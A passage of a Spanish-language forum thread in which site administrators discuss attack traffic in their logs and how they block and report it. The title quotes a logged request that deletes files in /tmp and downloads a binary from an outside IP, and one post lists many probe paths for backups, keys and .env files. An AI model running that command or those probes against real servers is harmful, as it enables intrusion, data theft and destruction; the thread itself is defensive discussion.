La verdad es interesante ver a dónde van y que contiene lo que te quieren hacer descargar, se puede aprender de esos códigos porque muchos son códigos privados que solo los atacantes los crean, no están publicados, se puede aprender la forma que utilizan para infectar, para no ser detectados, te hacen descargar cosas, instalarlas o llevarte datos de tu servidor al suyo y después borrar todo, por ejemplo borrar los logs, ademas he llegado a ver hasta códigos en reverso y después lo invertian y los ejecutaban, incluso hasta usaban varios lenguajes, por ejemplo te querían descargar en el servidor un archivo bash pero este a su vez descargaba uno en Python y desde Python ejecutaban otro en Perl.

También en esos códigos se podía ver cómo hacían todas las instrucciones y después borraban todo automáticamente para no dejar rastros, pero las formas y métodos que usaban eran interesante, lo mismo con los códigos que los programaban para que hagan tal cosa y realmente hasta sorprendía la forma que utilizaban de lograr lo que querían, todo eso lo analizaba y aprendía.

Otras veces cuando miraba el log de accesos veía como inventaban el URL Referer, ponían páginas o direcciones de IP con datos para que me interese y acceda, como si fuera que en tal dominios o IPs habían datos de mi foro o algo por el estilo, y analizaba esas direcciones desde modo raw mostrando por consola lo que había en el destino o guardaba la salida en un txt y lo miraba, y casi siempre eran puros virus para que los descargue desde el navegador apenas entre a esa dirección, de todas maneras yo usaba Firefox última versión, tenía todas las actualizaciones de Windows, tenía de firewall Comodo, además de Malwarebytes analizando todo el tiempo y también el Malwarebytes anti-rootkit, etc.

Otras veces pasaba que en el foro aparecían como bots de Google, usaban el user-agent de los bots spiders y recorrían el foro, esto lo hacían para ver si podían ver algo que los visitantes o usuarios no podían ver y realmente veían lo mismo, pero lo hacían para eso o para ver si podían tener algún acceso a algún lado.

Llegué a ver también que en los archivos por ejemplo de Python usaban números chars (por ejemplo chr(99)) y estos los unian para formar comandos y así ejecutarlos.


Saludos


Título: Re: GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86
Publicado por: el-brujo en 9 Enero 2021, 00:06 am
Quizás sea una buena idea reportar automáticamente las ip's a alguna servicio de terceros. He visto que hay varios servicios (un montón), cuando buscas por Google por una IP maliciosa ya aparecen los reportes y demás.

Los intentos fallidos de fail2ban por ssh son alarmantes xD

(https://ns2.elhacker.net/monitorix/imgs/fail2ban0z.1month.png)

Citar
Otras veces pasaba que en el foro aparecían como bots de Google, usaban el user-agent de los bots spiders y recorrían el foro, esto lo hacían para ver si podían ver algo que los visitantes o usuarios no podían ver y realmente veían lo mismo, pero lo hacían para eso o para ver si podían tener algún acceso a algún lado.

Hay una regla en CloudFlare para bloquear los bots falsos, ip's que no pertenecen al rango de bots de Google y la tenemos activada

Acabaré haciendo el log del mod_security público y en tiempo real. Ví que habia un panel de control para mod_security pero sólo para Plesk.

El WAF de CloudFLare no para de trabajar, pero ni en versión de pago se pueden bajar o descargar los logs de registro, lo cuál es una pena.


Título: Re: GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86
Publicado por: Danielㅤ en 9 Enero 2021, 14:20 pm
Si es buena idea reportar esas IPs maliciosas, de hecho esta misma petición ya aparece en Google, ya lo han reportado en varios sitios:

https://www.google.com.ar/search?&q=Re%3A+GET+%2Fshell%3Fcd%2B%2Ftmp%3Brm%2B-rf%2B*%3Bwget%2B185.172.111.214%2Fbins%2FUnHAnaAW.x86

En mí servidor VPS no disponía de CloudFlare.

Eso estamos esperando el reporte completo del log del mod_security ;)


Saludos


Título: Re: GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86
Publicado por: el-brujo en 11 Enero 2021, 13:32 pm
Muy divertido también ver todas las peticiones no encontradas.

La mayoría en busca de scripts de wordpress y copias de seguridad:

Errores 404

Código:
/config.bak.php
/admin.php
/admin/index.php
/phpMyAdmin/
/app/etc/local.xml
/phpmyadmin/
/shell.php
/wp-content/uploads/
/admin/logs/errors.log
/backup.sql
/database.sql
/db.sql
/m.php
/localhost.sql
/mysql.sql
/.ksh_history
/.zsh_history
/dbdump.sql
/.env.development.local
elhacker.net.sq
/backup.sql.gz
/server.key
/key.pem
/www.key
/elhacker.net.sql.gz
/mysqldump.sql
/wp-content/uploads/upload_index.php
/wp-content/backup-db/
/www.elhacker.net.sql.gz
/phpinfo.php
/elhacker.net.tar.gz
/my.key 2 -
/site.sql 2 -
/elmah.axd 2 -
/www.tar.gz
/backup.rar
/www.elhacker.net.tar.gz
/privatekey.key
/db_backup.sql
/.env.prod.local 2 -
/.env.production.local 2 -
/temp.sql 2 -
/www.elhacker.net.gz 2 -
/translate.sql 2 -
/api/api-browser/ 2 -
/wp-content/uploads/dump.sql 2 -
/www.elhacker.net.7z
/back/bak.zip
/_DB_.tar.gz
/old/bak.tar.gz
/backup-localhost.sql.gz
/www.elhacker.net.db
/backup/bak.tar.gz
/bak/www.sql 1 -
/restore/directory.tar.gz 1 -
/bak/directory.zip 1 -
/restore/elhacker.net.gz 1 -
/wp-content/plugins/three-column-screen-layout/db.php 1 -
/elhacker.tar.gz
/localhost-dump.sql.gz 1 -
/inc/database.php.bck 1 -
/elhackerdb.sql 1 -
/elhacker.net.xz 1 -
/_DB_.sql.zip
/dump.rar 1 -
/back/backup.gz
/www.elhacker.net.pem 1 -
/old/website.rar 1 -
/elhacker.net.sql.tar.gz 1 -
/wordpress/wp-config.php~ 1 -
/webadmin.php 1 -
/backup/backup.tar.gz 1 -
/old/www.tar.gz
/backups/elhacker.net.gz 1 -
/wp-content/plugins/wp-1ogin_bak.php 1 -
/elhacker.net.sql.tar.z
/restore/backup.tar.gz 1 -
/backup.tgz 1 -
/restore/.well-known.zip 1 -
/js/mage/adminhtml/sales.js 1 -
/elhacker.bck.sql
/www.elhacker.net.tar 1 -
/old/backup.gz 1 -
/elhacker.gz
/inc/config.php.bck 1 -
/backup/elhacker.net.zip 1 -
/backup/www.zip 1 -
/localhost_database.sql.gz
elhacker.net.bak.sql 1 -
/back/backup.tar.gz 1 -
/restore/directory.gz 1 -
/backupelhacker.net.sql 1 -
/localhost-db.sql.gz 1 -
/backups/www.gz 1 -
/elhacker_backup.gz
/backup.ibz 1 -
/www.elhacker.tar 1 -
/bak.rar 1 -
/db_backup.elhacker.sql.gz 1 -
/localhostbackup.sql.gz
//backup/wp-admin/install.php 1 -
/administrator/index.php 1 -
/backups/backup.tar.gz 1 -
/restore/website.tar.gz
/back/credentials.txt 1 -
/backupelhacker.net.sql.gz 1 -
/back/www.gz 1 -
/bak/sql.sql
/bak/website.tar.gz 1 -
/bak/www.gz
/site.tgz 1 -
/backups/elhacker.net.tar.gz 1 -
/localhost_db.sql.gz 1 -
/public_html.tar
/elhacker.net.z 1 -
/localhost_dump.sql 1 -
/conf/database.bck 1 -
/site.rar 1 -
/elhacker.net.sql.zip
/backups/www.rar
/htodcs.rar 1 -
/elhacker.sql 1 -
/elhacker.net_database.sql
/backup/backup.bz2 1 -
/elhacker_backup.tgz 1 -
/restore/elhacker.net.rar
/web.rar 1 -
/home.tar 1 -
/back/elhacker.net.zip
/elhacker.net.bck 1 -
/bak/elhacker.net.sql
www.elhacker.net.sql.bz2 1 -
/backup.backup
/db.php.bck 1 -
/elhacker.net-backup.sql.gz 1 -
/elhacker.bck
/back/sql.sql 1 -
/conf/config.php.bck
elhacker.net_dump.sql 1 -
/elhacker_db.sql 1 -
/elhacker.net_db.sql 1 -
/backups/bak.zip 1 -
/conf.gz
[..]


Título: Re: GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86
Publicado por: Danielㅤ en 11 Enero 2021, 14:04 pm
jajaja pues si, hay solicitudes hasta de quererse descargar el sitio entero:

Código:
elhacker.net.tar.gz
backup.rar
www.elhacker.net.tar.gz
www.elhacker.net.gz
www.elhacker.net.7z
elhacker.tar.gz
[...]

aunque también hay de quererse descargar bases de datos y hasta credenciales de acceso.


Saludos


Título: Re: GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86
Publicado por: el-brujo en 14 Enero 2021, 00:04 am
Finalmente voy a usar AbuseIPDB  para reportar las IP's de ataques hacking mod_security y brute-force login ssh y ftp vía fail2ban

(https://www.abuseipdb.com/img/abuseipdb.png.pagespeed.ce.CI8T6WsXU7.png)

Ya tengo la API creada y empezaré a reportar en breve. El límite son 3.000 ip's diarias xD

Integrating AbuseIPDB with Fail2Ban - Automatically Report Bad IPs
https://www.abuseipdb.com/fail2ban.html

Instalar y configurar Fail2ban
https://blog.elhacker.net/2014/05/instalar-y-configurar-fail2ban.html


Título: Re: GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86
Publicado por: Danielㅤ en 14 Enero 2021, 13:49 pm
Me parece muy bien que ayudes a reportar las IPs maliciosas, conozco esa página y es muy buena por cierto.
Yo en mis tiempos usaba EfnetRBL (https://rbl.efnetrbl.org/) y DroneBL (https://dronebl.org/).


Saludos


Título: Re: GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86
Publicado por: el-brujo en 17 Enero 2021, 11:17 am
Empiezan los reportes:

https://www.abuseipdb.com/user/52197

De momento intentos SSH fallidos (SSH Brute Force Attacks). Después añadiremos ataques FTP fuerza bruta y reglas mod_security.

(https://www.abuseipdb.com/contributor/52197.svg)

Uno de las ip's que le encanta buscar por copias sql es el ASN Russia AS49505 SELECTEL. Bloqueado entero, porque su tráfico no hace otra cosa más que buscar vulnerabilidades

Y uno de los escaners utilizados es (User-Agent)

Código:
Nuclei - Open-source project (github.com/projectdiscovery/nuclei)


Título: Re: GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86
Publicado por: Danielㅤ en 19 Enero 2021, 15:03 pm
Bien brujo, más de 440 IPs reportadas hasta ahora!  (https://foro.elhacker.net/Themes/converted/images/post/thumbup.gif)


Saludos